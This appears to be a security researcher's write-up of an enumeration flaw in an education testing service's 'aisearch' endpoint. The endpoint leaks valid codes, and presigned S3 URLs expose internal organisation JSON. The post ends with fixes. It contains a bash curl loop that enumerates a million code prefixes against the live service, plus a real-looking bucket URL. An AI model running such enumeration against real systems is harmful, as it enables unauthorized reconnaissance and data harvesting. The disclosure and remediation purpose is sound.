Just another endpoint:
/pine/aisearch?aicode=XXXXXXSimple input. Simple output. Nothing interesting… until it was.
The Spark
I was testing it from a normal student account.
The behavior was straightforward:
- Send an
aicode - Get a response with
hits.total
But then something stood out:
hits.total = 0→ invalid codehits.total > 0→ valid code
That's when it clicked.
This wasn't just a search endpoint.
It was an oracle.
Phase 1 — Turning It into an Enumeration Machine
The AI code format:
^\d{6}[\dA-Z]{6}$The first 6 digits? That's the key.
Instead of brute-forcing 10¹² combinations, I only needed to scan 10⁰⁶ prefixes.
That's not brute force anymore. That's feasibility.
Quick script:
for i in {000000..999999}; do
response=$(curl -s "https://[app]/pine/aisearch?aicode=${i}XXXXXX")
if echo "$response" | grep -q '"total":1'; then
echo "[+] Valid prefix found: $i"
fi
doneAnd just like that… valid prefixes start revealing themselves.
Phase 2 — The Unexpected Door (S3)
While tracing the backend flow, something more interesting showed up.
The server was generating presigned AWS S3 URLs.
Example:
https://cb-cds-org-update-pine.s3.us-east-1.amazonaws.com/1008877/ais_1008877.json?X-Amz-...What makes this worse?
- No authentication required
- No cookies
- Accessible by anyone with the link
- Valid for 1 full hour
If that URL leaks… it's done.
Phase 3 — What's Inside?
Opening the JSON turned this from a minor bug into something else entirely.
{
"orgId": "1008877",
"aiCodes": [
{
"aiCd": "098522",
"aiLevelCd": "2",
"aiSourceCd": "CC",
"aiStatusCd": "2",
"apEligibilityInd": "Y",
"psatEligibilityInd": "Y",
"satEligibilityInd": "Y",
"clepEligibilityInd": "Y",
"annualReviewInd": "N",
"initialIngestionPathCd": "1",
"ssdEligibilityInd": "Y"
}
]
}This isn't just data.
This is:
- Internal organization IDs
- Valid AI codes
- Program eligibility logic (AP / SAT / PSAT / CLEP / SSD)
- Operational flags
- System behavior hints
In other words… a blueprint.
Why This Matters (Even Without PII)
A common mistake is downplaying bugs like this because "there's no personal data."
That's missing the point.
1. Attack Surface Reduction
Instead of guessing blindly, you now have valid prefixes.
2. System Logic Exposure
You understand how eligibility decisions are structured.
3. Reconnaissance Advantage
Small leaks combine into a full system map.
4. Chaining Potential
This isn't the attack. This enables future attacks.
The Real Issue
The problem wasn't just S3. And it wasn't just the endpoint.
It was the combination:
- An endpoint acting as an oracle
- No rate limiting
- Presigned URLs exposed to the client
- Overly verbose JSON responses
That combination turned a simple feature… into a scalable vulnerability.
How I'd Fix It
Immediate
- Add strict rate limiting (e.g., 10 requests/minute per user)
- Revoke all existing presigned URLs
Short-term
- Stop exposing S3 URLs to clients
- Proxy requests through the backend
- Return only necessary fields
Medium-term
- Sanitize S3 payloads
- Remove internal metadata fields
- Add logging and anomaly detection for enumeration patterns
Final Thought
The most dangerous vulnerabilities aren't the ones that break systems.
They're the ones that teach you how the system works.
Because once the system starts explaining itself… you're no longer attacking it.
You're reading it.